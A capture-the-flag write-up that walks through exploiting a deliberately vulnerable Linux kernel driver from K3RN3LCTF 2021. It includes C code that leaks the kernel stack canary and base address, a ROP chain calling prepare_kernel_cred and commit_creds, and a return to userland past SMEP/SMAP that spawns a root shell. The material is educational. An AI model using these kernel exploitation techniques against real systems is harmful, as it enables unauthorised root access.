Skip to content

Easy_Kernel Writeup from K3RN3LCTF 2021

   

It’s been a while, huh?

Today, we will dive into the basics of Linux Kernel Exploitation. I am not very experienced when it comes to Linux Kernel Exploitaion and I am still learning. So, I am writing about the challenge I solved this weekend in K3RN3LCTF 2021.

First Look

First look of the Challenge

We have a bunch of files to work with. Let’s first understand what each file actually does

  • bzImage - (short for Big ZImage) it is the compressed Linux Kernel.
  • fs - Uncompressed file system root directory for the VM.
  • initramfs.cpio.gz - Compressed file system for the VM.
  • launch.sh - Bash script to run the VM.
  • rebuild_fs.sh - Bash script to get compressed initramfs.cpio.g from the “fs” folder.
  • vuln.ko - Vulnerable Linux Kernel Driver.

The first thing we need to do is figure out what’s going on in the Vulnerable Driver.

What is a kernel driver?

bruh moment

Before we dive into reverse engineering the kernel driver, first let’s understand what is a Linux Kernel Driver.

A Linux kernel driver is a specific type of program that allows hardware and software to work together to accomplish a task. Whenever you try to print a document, a kernel driver handles your request and sends it to the actual printer. it simply acts like a medium between the Operating System and the hardware.

In linux each kernel driver has to register a device file, which is used by the userland programs to interact with the driver. For example, whenever you redirect some output to “/dev/null” you are interacting with the kernel driver.

These drivers are called "character special device".

Okay, but how do I interact with a kernel driver?

Your userland program can interact with the kernel driver by first getting a handle to it. Now, with that handle you can do read/write/ioctl syscalls to read and write data from the driver.

Example:

 1int get_random_bytes(){
 2    
 3    /* get handle to /dev/urandom */
 4    int fd = open("/dev/urandom", O_RDONLY);
 5    int random_bytes = 0;
 6
 7    /* read random bytes on stack variable */
 8    read(fd, &random_bytes, sizeof(random_bytes));
 9
10    /* return random bytes */
11    return random_bytes;
12}

The above function interacts with the driver for “/dev/urandom” to get some random bytes.

So each kernel driver implements a bunch of device functions like -

  • device_open - called whenever a program tries to open the device using SYS_open.
  • device_read - called whenever a program does a SYS_read on the device’s fd.
  • device_write - called whenever a program does a SYS_write on the device’s fd.
  • device_release - called whenever a program does a SYS_close on the device’s fd.

If you are not familiar with linux kernels please skim through this cool article The gist is that you interact with the driver by doing syscalls.

Now let’s try to reverse engineer what the vulnerable driver is doing.

Reversing Vuln.ko

Okay, Let’s open the driver in IDA Pro. A kernel driver does not have a main function, we have to reverse the individual device functions.

function list

Let’s start with sopen function.

sopen

open_function

This function just prints “Device opened”.

sread

read_function

This function writes the string “Welcome to this kernel pwn series” on the kernel stack variable and then nbytes number of bytes are copied to the userland buffer with the copy_user_generic_unrolled() function.

What this means is that if we did a SYS_read on the device’s fd we would get the string “Welcome to this kernel pwn series\x00” in our buffer.

One thing to note here is that the user controls how many bytes to read and the memory that is being copied is the Kernel Stack. This is a Memory Leak Vulnerability, because user can read arbitrary amount of bytes from the kernel stack, which may contain kernel pointers.

So, we mark sread function as vulnerable and move to the next function.

swrite

write_function

This function copies the data from userland_buffer to the stack variable on the kernel stack. It only copies the first nbytes number of bytes only if nbytes is smaller than MaxBuffer, which is a global variable in the driver. nbytes is again user controlled and it leads to Kernel Stack Buffer Overflow Vulnerability.

This function has a bound check, which checks if nbytes is smaller than MaxBuffer MaxBuffer is initialized with 0x40.

ioctl_function

The buffer size is 128 bytes and MaxBuffer is only 0x40. so, we cannot send more than 0x40 bytes. If we could modify MaxBuffer in someway we may be able to corrupt the stack.

sioctl

ioctl_function

This function is a special function and is invoked when user does an SYS_ioctl syscall. SYS_ioctl syscall allows you to send commands to the kernel driver.

in the sioctl function above you can see there are only 2 commands.

  • #16 - just prints the value you pass to it.
  • #32 - sets the global variable MaxBuffer to the value you pass to it.

and if you remember MaxBuffer is the cap on the number of bytes we can write on kernel stack of swrite function. by using this ioctl we can modify the value of MaxBuffer which enables us to currupt Stack.

Writing your first Kernel Exploit

I will be using the musl-libc instead of glibc because in kernel exploitation challenges sometimes the author does not let you upload the exploit in a sane way so you have to send the exploit using the base64encode->paste to a file->base64decode method. So, it helps when the total size of the binary is small.

I was using glibc for this challenge initially but after completing the exploit, i was not able to upload the binary because the session timed out before i could finish pasting the base64 encoded text.

Before we start writing the exploit, we first need a few helper functions that will come in handy while debugging.

This is the exploit template i used.

  1#include <stdio.h>
  2#include <stdlib.h>
  3#include <unistd.h>
  4#include <stdint.h>
  5#include <string.h>
  6#include <fcntl.h>
  7#include <signal.h>
  8#include <fcntl.h> 
  9#include <sys/mman.h>
 10#include <sys/syscall.h>
 11#include <sys/types.h>
 12#include <sys/stat.h>
 13#include <sys/ioctl.h>
 14
 15#if HAVE_STROPTS_H
 16#include <stropts.h>
 17#endif
 18
 19char exploit[0x1000]; /* exploit buffer */
 20uint64_t counter = 0; /* counter */
 21int fd = 0;           /* file descriptor for pwn_device */
 22
 23unsigned long user_cs, user_ss, user_rflags, user_sp;
 24
 25void save_state(){
 26    __asm {linenos=inline}__(
 27        ".intel_syntax noprefix;"
 28        "mov user_cs, cs;"
 29        "mov user_ss, ss;"
 30        "mov user_sp, rsp;"
 31        "pushf;"
 32        "pop user_rflags;"
 33        ".att_syntax;"
 34    );
 35    puts("[*] Saved state");
 36}
 37
 38void get_shell(void){
 39    puts("[*] Returned to userland");
 40    if (getuid() == 0){
 41        printf("[*] UID: %d, got root!\n", getuid());
 42        system("/bin/sh");
 43    } else {
 44        printf("[!] UID: %d, didn't get root\n", getuid());
 45        exit(-1);
 46    }
 47}
 48
 49void hexdump(const void* data, size_t size) {
 50    char ascii[17];
 51    size_t i, j;
 52    ascii[16] = '\0';
 53    for (i = 0; i < size; ++i) {
 54        printf("%02X ", ((unsigned char*)data)[i]);
 55        if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') {
 56            ascii[i % 16] = ((unsigned char*)data)[i];
 57        } else {
 58            ascii[i % 16] = '.';
 59        }
 60        if ((i+1) % 8 == 0 || i+1 == size) {
 61            printf(" ");
 62            if ((i+1) % 16 == 0) {
 63                printf("|  %s \n", ascii);
 64            } else if (i+1 == size) {
 65                ascii[(i+1) % 16] = '\0';
 66                if ((i+1) % 16 <= 8) {
 67                    printf(" ");
 68                }
 69                for (j = (i+1) % 16; j < 16; ++j) { printf("   ");
 70                }
 71                printf("|  %s \n", ascii);
 72            }
 73        }
 74    }
 75}
 76
 77
 78void telescope(char * buffer, int size){
 79    size = size - (size % 8);
 80    for (int i = 0; i < size; i+=8){
 81        printf("[0x%.3x] 0x%.16lx\n", i, *(uint64_t *)&buffer[i]);
 82    }
 83}
 84
 85int s08(char a, int len){
 86    for (int i = 0; i < len; i++){
 87        exploit[counter + i] = a;
 88    }
 89    counter += len;
 90    return len;
 91}
 92
 93int s64(uint64_t val){
 94    *(uint64_t *)(exploit + counter) = val;
 95    counter += 8;
 96    return counter;
 97}
 98
 99int pwn(){
100    
101    save_state();
102
103    /* your exploit here */
104
105
106    /*                   */
107
108    return 0;
109}
110
111int main(){
112    return pwn();
113}
114

Okay, first let’s create a function which will get the handle to the vulnerable device. In this challenge the vulnerable driver is in “/proc/pwn_device”.

1void get_device(){
2    fd = open("/proc/pwn_device", O_RDWR);
3	if (fd < 0){
4		puts("[!] Failed to open device");
5	} else {
6        puts("[*] Opened device");
7    }
8}

We can call this function inside the pwn() to get the file descriptor. Now let’s try to read from the driver and let’s see if we receive the “Welcome to this kernel pwn series” string or not.

 1int pwn(){
 2    
 3    save_state(); /* saves useful registers */
 4    get_device(); /* opens the driver */
 5
 6    char buffer[0x100] = {0};
 7    read(fd, buffer, 0x100); /* read into buffer */
 8    puts(buffer); /* print everythin we read */
 9
10    return 0;
11}

Just put this pwn function in your exploit.c and then build it. For building the exploit i use a Makefile

all:
	musl-gcc -O3 -static exploit.c -o fs/exploit

Now we need to run make in terminal to build the exploit and then use the rebuild_fs.sh script to build the initramfs

build commands

Now we can run the VM to test our exploit using “./launch.sh” Once in the VM, you can run the exploit by running “/exploit

build commands

Okay, our read syscall read the string which is perfect. Let’s try crashing the kernel by currupting the stack.

before we can overwrite important stuff on the stack, we need to bypass the bound check which was comparing the nbytes to MaxBuffer.

To bypass the check we need to do an ioctl syscall and send the new value of MaxBuffer with command #32. Now, we can send a bunch of “A"s to see if a kernel bruh moment happens or not.

 1int pwn(){
 2    
 3    save_state(); /* saves useful registers */
 4    get_device(); /* opens the driver */
 5
 6    ioctl(fd, 32, sizeof(exploit));
 7
 8    memset(exploit, 'A', sizeof(exploit));
 9    write(fd, exploit, sizeof(exploit));
10    return 0;
11}

Running the exploit leads to a kernel panic because we corrupted the stack canary.

kernel bruh moment

RIP Control

The reason for kernel panic in the above picture is that we corrupted the stack cookie and not the actual return address.

How do we leak the cookie? Remember we have a Memory Leak Vulnerability in sread? we can use that bug to leak stack cookie.

I will use gdb-gef gdb plugin because it’s faster than my other favorite gdb plugin (pwndbg) We also need the uncompressed vmlinux file from the compressed bzImage. To extract vmlinux i will use this script.

$ ./extract-vmlinux.sh ./bzImage > vmlinux
$ file ./vmlinux
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), ... stripped

For debugging i like the setup where i have both gdb and the vm opened side by side.

kernel bruh moment

Also for debugging i edited the “fs/init” file to give us root access on the VM. And i also disabled KASLR in the ./launch.sh

First thing you may want to do is comment out the 12th line in fs/init to get root access on the VM. For enabeling gdbserver in qemu-system-x86_64 you must add the “-s” flag in “./launch.sh”. For disabling KASLR you must replace “kaslr” with “nokaslr” in “./launch.sh

Modified “fs/init":

 1#!/bin/sh
 2
 3mount -t proc none /proc
 4mount -t sysfs none /sys
 5mount -t 9p -o trans=virtio,version=9p2000.L,nosuid hostshare /home/ctf
 6
 7insmod /vuln.ko
 8
 9chown root /flag.txt
10chmod 700 /flag.txt
11
12# exec su -l ctf # comment me to gain root
13/bin/sh

Modified “./launch.sh":

 1#!/bin/bash
 2
 3SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )"
 4
 5/usr/bin/qemu-system-x86_64 \
 6    -s \
 7	-m 64M \
 8	-cpu kvm64,+smep,+smap \
 9	-kernel $SCRIPT_DIR/bzImage \
10	-initrd $SCRIPT_DIR/initramfs.cpio.gz \
11	-nographic \
12	-monitor none \
13	-append "console=ttyS0 nokaslr quiet panic=1" \
14	-no-reboot

Now qemu-system-x86_64 is running in debug mode. You can attach to it using gdb just run “target remote :1234” to attach to the kernel.

You can get the addresses of functions in the driver by greping “/proc/kallsyms” if you don’t have root access on the VM, all the addresses will be 0s. For getting the addresses you must have root access

This is what you will see when you don’t have root access.

without root

This is what you will see when you have root access.

root

Now that we have the addresses and we also have disabled KASLR, we can easily debug the kernel.

For Leaking the stack cookie, we will use the sread function to read 0x400 bytes to us. So, first let’s set a breakpoint at sread.

breakpoint

I created a do_read() function which takes a buffer and number of bytes as argument and does the read syscall for you, and similarly other helper functions.

 1int do_read(char * buffer, int size){
 2    return read(fd, buffer, size);
 3}
 4
 5int do_ioctl(int cmd, int arg){
 6    return ioctl(fd, cmd, arg);
 7}
 8
 9int do_write(char * buffer, int size){
10    return write(fd, buffer, size);
11}
12
13
14int pwn(){
15    
16    save_state(); /* saves useful registers */
17    get_device(); /* opens the driver */
18    
19    /* leak stack_cookie */
20    memset(exploit, 0, 0x1000);
21    do_read(exploit, 0x400);
22
23    telescope(exploit, 0x400);
24}

After setting the breakpoint, you can continue execution and run the exploit in the VM.

Once the breakpoint is hit, inspect the Kernel Stack to see if you can spot the stack cookie. In the below screenshot you can see the stack cookie is placed on the stack.

cookie

In this screenshot you can see the layout of the stack.

stack layout for sread

The telescope() function will print the leaked stack into hex format. This is the output we get.

telescope

So you can see we are able to leak the stack cookie at an offset of 0x80 and 0x70. You can also see that we are able to leak a Kernel Pointer at offset 0x90, using this leak we can bypass KASLR. We have disabled KASLR and hence for us the Kernel Base address is 0xffffffff81000000 We can easily get the offset of this kernel pointer by subtracting the Kernel Base address from the leaked value and we get 0x23e347, we can also calculate the address of some crucial functions like commit_cred and prepare_kernel_cred. We will discuss more about these function when we will construct our ROP Chain. So, we add this in our pwn() function.

1    uint64_t stack_cookie = *(uint64_t *)&exploit[0x80];
2    uint64_t kernel_base  = *(uint64_t *)&exploit[0x90] - 0x23e347;
3    uint64_t commit_creds = kernel_base + 0x87e80;
4    uint64_t prepare_kernel_cred = kernel_base + 0x881c0;
5    
6    printf("[+] Stack Cookie : 0x%.16lx\n", stack_cookie);
7    printf("[+] Kernel Base  : 0x%.16lx\n", kernel_base);

This is what it looks like when you run the exploit now.

leak

Now we can move on to writing a ROP Chain, but before we talk about that we must know what can we do to gain root privileges.

prepare_kernel_cred and commit_creds

The kernel tracks the user privileges (and other data) of every running process in the task_struct structure.

 1struct task_struct {
 2    struct thread_info    	thread_info;
 3
 4    /* -1 unrunnable, 0 runnable, >0 stopped: */
 5    volatile long         	state;
 6
 7    void                  	*stack;
 8    atomic_t              	usage;
 9	// ...
10    int                   	prio;
11    int                   	static_prio;
12    int                   	normal_prio;
13    unsigned int          	rt_priority;
14
15    struct sched_info     	sched_info;
16
17    struct list_head      	tasks;
18
19    pid_t                 	pid;
20    pid_t                 	tgid;
21
22    /* Process credentials: */
23
24    /* Objective and real subjective task credentials (COW): */
25    const struct cred __rcu  *real_cred;
26
27    /* Effective (overridable) subjective task credentials (COW): */
28    const struct cred __rcu  *cred;
29	// ...
30};

In this task_struct structure we have the process credentials which hold the effective user id.

 1struct cred {
 2    atomic_t    usage;
 3    kuid_t   	 uid;   	 /* real UID of the task */
 4    kgid_t   	 gid;   	 /* real GID of the task */
 5    kuid_t   	 suid;   	 /* saved UID of the task */
 6    kgid_t   	 sgid;   	 /* saved GID of the task */
 7    kuid_t   	 euid;   	 /* effective UID of the task */
 8    kgid_t   	 egid;   	 /* effective GID of the task */
 9    kuid_t   	 fsuid;   	 /* UID for VFS ops */
10    kgid_t   	 fsgid;   	 /* GID for VFS ops */
11    unsigned    securebits;    /* SUID-less security management */
12    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
13    kernel_cap_t    cap_permitted;    /* caps we're permitted */
14    kernel_cap_t    cap_effective;    /* caps we can actually use */
15    kernel_cap_t    cap_bset;    /* capability bounding set */
16    kernel_cap_t    cap_ambient;    /* Ambient capability set */
17	// ...
18};
19

For the root user the effective user id is 0, in other words if we can change the value of current_task->creds->euid to 0, then the current process will become root. After setting the effective user id of the current process to zero, we have to safely return to userland and then only we will be able get a root shell.

Let’s also discuss about the mitigations implemented in the Linux Kernel.

  1. K ernel Address Space Layout Randomization (KASLR) - it randomizes the base address of the kernel each time the system is rebooted.

  2. Kernel Stack Cookies (CANARIES) - Mitigation to protect against stack based buffer overflow attacks, exactly similar to userland.

  3. Supervisor Mode Execution Protection (SMEP) - this feature marks all the userland pages in the page table as non-executable when the process is in kernel-mode. In the kernel, this is enabled by setting the 20th bit of Control register CR4.

  4. Supervisor Mode Access Prevention (SMAP) - this feature marks all the userland pages in the page table as non-accessible when the process is in kernel-mode, which means they cannot be read or written as well. In the kernel, this is enabled by setting the 21st bit of Control register CR4.

  5. Kernel Page-Table Isolation (KPTI) - this feature separates user-space and kernel-space page tables entirely, instead of using just one set of page tables that contain both user-space and kernel-space addresses. One set of page tables includes both kernel-space and user-space addresses asame as before, but it is only used when the system is running in kernel mode. The seconds set of page tables for use in the user mode contains a copy of user-space and a minimal set of kernel-space addresses.

(Ref. lkmidas.github.io)

We understood that to gain a root shell we need to set the current_task->cred->euid to 0, we can do it in 2 ways, the harder way or the easier way. The harder way is to craft a ropchain that gets the address of current_task and then we access the individual members to reach the euid member and then we set that to zero. The easier way is to call prepare_kernel_cred(struct task_struct * reference_task_stuct) function with NULL as its argument and it will return a cred struct which has its euid set to 0, which is exactly what we want. But how do we set this new cred struct to our process? we can do that by passing the returned cred struct to a function called commit_creds(stuct cred * ). The credentials are supposed to be immutable (i.e., they can be caches elsewhere, and shouldn’t be updated in place). Instead, they can be replaced.

So, in theory we just do commit_creds(prepare_kernel_cred(0)); to get root shell.

Give me root.

At this point, we have everything that we need. We have Kernel Base, we have kernel stack cookie, we have address of prepare_kernel_cred and commit_creds. Let’s get the root shell.

First let’s figure out the offset in the stack where we need to overwrite the stack cookie.

One way to figure it out is if we see the disassembly of the swrite function, where it was writing the cookie on the stack.

cookie2

You can see its writing the cookie at an offset of 0x80. So, this was one way to figure out. One other method is to use the output of pwn cyclic 0x400 by sending this output to the kernel stack and see what was our cookie overwritten with and then calculate the offset of the cookie from this cyclic pattern.

You can use the similar method to figure out the offset of return address.

Offset of stack cookie turns out to be 0x80 and offset of return address turns out to be 0x90.

1    int cookie_offset = 0x80/8; 
2    int return_offset = 0x90/8;

We divide the offset by 8 because only then it will become the index in our exploit buffer which is an array of unsigned long.

So our ROP Chain would look something like this

 1    exploit = pwn.cyclic(0x80) # offset for cookie
 2    exploit += pwn.p64(stack_cookie)
 3    exploit += pwn.p64(0) # rbx
 4    exploit += pwn.p64(POP_RDI) # rdi = NULL
 5    exploit += pwn.p64(0)
 6    exploit += pwn.p64(prepare_kernel_cred)
 7    exploit += pwn.p64(MOV_RDI_RAX) # mov the returned cred structure
 8                                    # in rdi to be the argument for commit_creds
 9    exploit += pwn.p64(commit_creds)
10    exploit += pwn.p64(somehow_return_to_userland_safely)

You can easily find the POP_RDI gadget but finding the MOV_RDI_RAX gadget is hard. But you would find this gadget instead of “mov rdi, rax ; ret”.

1    mov rdi, rax
2    jne 0xffffffff813b34f1
3    xor eax, eax
4    ret

And right away you can notice an issue with this gadget, which is the jne instruction. zero flag must be set so that we don’t take the jump and safely return from the gadget. To do just that we have to find these gadgets.

1    pop rdx
2    ret
1    cmp rdx, 8
2    jne 0xffffffff81a3003e
3    ret 

These two gadgets allows us to set the zero flag. We can chain these gadgets together to execute the MOV_RDI_RAX gadget.

Our new ROP Chain would look like this.

 1    exploit = pwn.cyclic(0x80) # offset for cookie
 2    exploit += pwn.p64(stack_cookie)
 3    exploit += pwn.p64(0) # rbx
 4    exploit += pwn.p64(POP_RDI) # rdi = NULL
 5    exploit += pwn.p64(0)
 6    exploit += pwn.p64(prepare_kernel_cred)
 7    exploit += pwn.p64(POP_RDX)
 8    exploit += pwn.p64(8)
 9    exploit += pwn.p64(CMP_RDX_8)
10    exploit += pwn.p64(MOV_RDI_RAX) # mov the returned cred structure
11                                    # in rdi to be the argument for commit_creds
12    exploit += pwn.p64(commit_creds)
13    exploit += pwn.p64(somehow_return_to_userland_safely)

There is still one gadget missing, which is the “somehow_return_to_userland_safely” gadget. We will discuss about that later, first let’s build this rop chain in our exploit.

 1
 2#define PAGE_SIZE           0x001000
 3#define POP_RAX             0x00dc1e /* pop rax ; ret */
 4#define POP_RDI             0x001518 /* pop rdi ; ret */
 5#define POP_RDX             0x034b72 /* pop rdx ; ret */
 6#define MOV_RDI_RAX         0x3b3504 /* mov rdi, rax ; jne 0xffffffff813b34f1 ; xor eax, eax ; ret */
 7#define CMP_RDX_8           0xa30061 /* cmp rdx, 8 ; jne 0xffffffff81a3003e ; ret */
 8#define SWAPGS_RESTORE      0xc00a45 /* swapgs_restore_regs_and_return_to_usermode + 22 */
 9#define PREPARE_KERNEL_CRED 0x0cc140 /* prepare_kernel_cred */
10#define COMMIT_CREDS        0x0cbdd0 /* commit_creds */
11#define KERN_BASE           0xffffffff81000000
12
13/* ROP CHAIN */ 
14counter += cookie_offset * 8;
15s64(stack_cookie);
16counter += return_offset * 8 - counter;
17s64(kernel_base + POP_RDI);
18s64(0);
19s64(prepare_kernel_cred);
20s64(kernel_base + POP_RDX);
21s64(0x8);
22s64(kernel_base + CMP_RDX_8);
23s64(kernel_base + MOV_RDI_RAX);
24s64(commit_creds);
25s64(0xdeadbeeff00dbabe)

This exploit will crash the kernel because RIP will become 0xdeadbeeff00dbabe. We still don’t know how to safely return to the userland. If you just try to return to the get_shell function by replacing 0xdeadbeeff00dbabe with the address of get_shell, then this would happen.

cookie2

We triggered SMEP. We tried to execute userland code from kernel. With SMEP enabled all userland code is marked non non-executable and to bypass this we may craft a ROP chain to modify the 20th bit of the CR4 Register and only then we can go back to the userland. But there is an easier way to go back to userland without triggering SMEP or SMAP or KPTI.

We have to use the swapgs_restore_regs_and_return_to_usermode gadget to switch back to userland safely. SWAPGS in an instuction which restores user’s GS and saves kernel pointers.

Specifically the gadget starts from swapgs_restore_regs_and_return_to_usermode + 22. This is what the gadget does.

cookie2

You can see in this gadget at address 0xffffffff81c00aa8 it pops values into rax and rdi. So, we will add 2 NULLS in our rop chain after this gadget.

IRETQ is an Interrupt return instruction which pops RIP, CS, RFLAGS, SP and SS. So, in our rop chain we just simply add them after our swapgs_restore_regs_and_return_to_usermode gadget.

This is what our final rop chain looks like.

 1    memset(exploit, '\0', 0x1000);
 2    /* ROP CHAIN */ 
 3    counter += cookie_offset * 8;
 4    s64(stack_cookie);
 5    counter += return_offset * 8 - counter;
 6    s64(kernel_base + POP_RDI);
 7    s64(0);
 8    s64(prepare_kernel_cred);
 9    s64(kernel_base + POP_RDX);
10    s64(0x8);
11    s64(kernel_base + CMP_RDX_8);
12    s64(kernel_base + MOV_RDI_RAX);
13    s64(commit_creds);
14    s64(kernel_base + SWAPGS_RESTORE);
15    s64(0); /* pop rax */
16    s64(0); /* pop rdi */
17    s64((uint64_t)get_shell);
18    s64(user_cs);
19    s64(user_rflags);
20    s64(user_sp);
21    s64(user_ss);
22
23    /* TRIGGER BUG AND GET ROOT */
24    do_write((char *)exploit, 0x800);

Let’s fire this exploit and see what happens.

cookie2

You can find the full exploit here